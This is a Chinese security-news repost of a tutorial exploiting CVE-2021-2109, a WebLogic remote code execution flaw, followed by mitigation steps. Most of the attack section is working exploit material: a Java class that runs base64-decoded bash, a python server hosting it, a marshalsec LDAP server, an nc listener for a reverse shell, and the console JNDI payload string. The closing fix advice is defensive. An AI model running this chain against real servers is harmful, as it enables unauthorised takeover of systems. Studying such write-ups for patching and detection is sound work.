微慑信息网

CVE-2021-2109 Weblogic RCE[附漏洞利用代码]

CVE-2021-2109 Weblogic RCE

△△△点击上方“蓝字”关注我们了解更多精彩
0x00 漏洞简介

Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。
0x01 影响版本
WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0
0x02 环境搭建
我用的是14883的靶场,网上很多docker的搭建教程,请自行百度
搞定后是下面这样

CVE-2021-2109 Weblogic RCE

 

0x03 漏洞利用
首先编译一个java文件(bash要base64)
import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;
public class Exploit{   public Exploit() throws Exception {       //Process p = Runtime.getRuntime().exec(newString[]{"cmd","/c","calc.exe"});     Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","echo'base64编码'|base64 -d |bash"});       InputStream is = p.getInputStream();       BufferedReader reader = new BufferedReader(new InputStreamReader(is));
       String line;       while((line = reader.readLine()) != null) {           System.out.println(line);       }
       p.waitFor();       is.close();       reader.close();       p.destroy();    }
   public static void main(String[] args) throws Exception {    }}
然后把class拉到服务器启动python服务
python -m SimpleHTTPServer 80

访问服务器,能看到资源就是启动成功

CVE-2021-2109 Weblogic RCE

启动exphttp服务启动ldap服务
java -cpmarshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip.ip.ip.ip/#Exploit 9998
nc端口开启监听
nc -lvnp xxxx
执行exp,反弹shell成功(get,post都可以)

CVE-2021-2109 Weblogic RCE

exp(注意ip是 1.1.1;1 有个分号)
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://x.x.x;x:9998/s4dzak;AdminServer%22)
 

 

0x03 修复建议
1、禁用T3协议
进入Weblogic控制台,在base_domain配置页面中,进入“安全”选项卡页面,点击“筛选器”,配置筛选器
在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则框中输入:* * 7001 deny t3 t3s
2、禁止启用IIOP
登陆Weblogic控制台,找到启用IIOP选项,取消勾选,重启生效
3、临时关闭后台/console/console.portal对外访问
4、升级官方安全补丁

 

END

如您有任何问题、建议、需求请后台留言NOVASEC公众号!

感谢大哥们的对NOVASEC的支持点赞和关注

加入我们与萌新一起成长吧!

CVE-2021-2109 Weblogic RCE

 

如有任何问题、建议、合作、投稿请加NOVASEC-MOYU,以方便及时回复。

 

 

原文始发于微信公众号(NOVASEC):CVE-2021-2109 Weblogic RCE

赞(0) 打赏
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » CVE-2021-2109 Weblogic RCE[附漏洞利用代码]

评论 抢沙发

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

觉得文章有用就打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册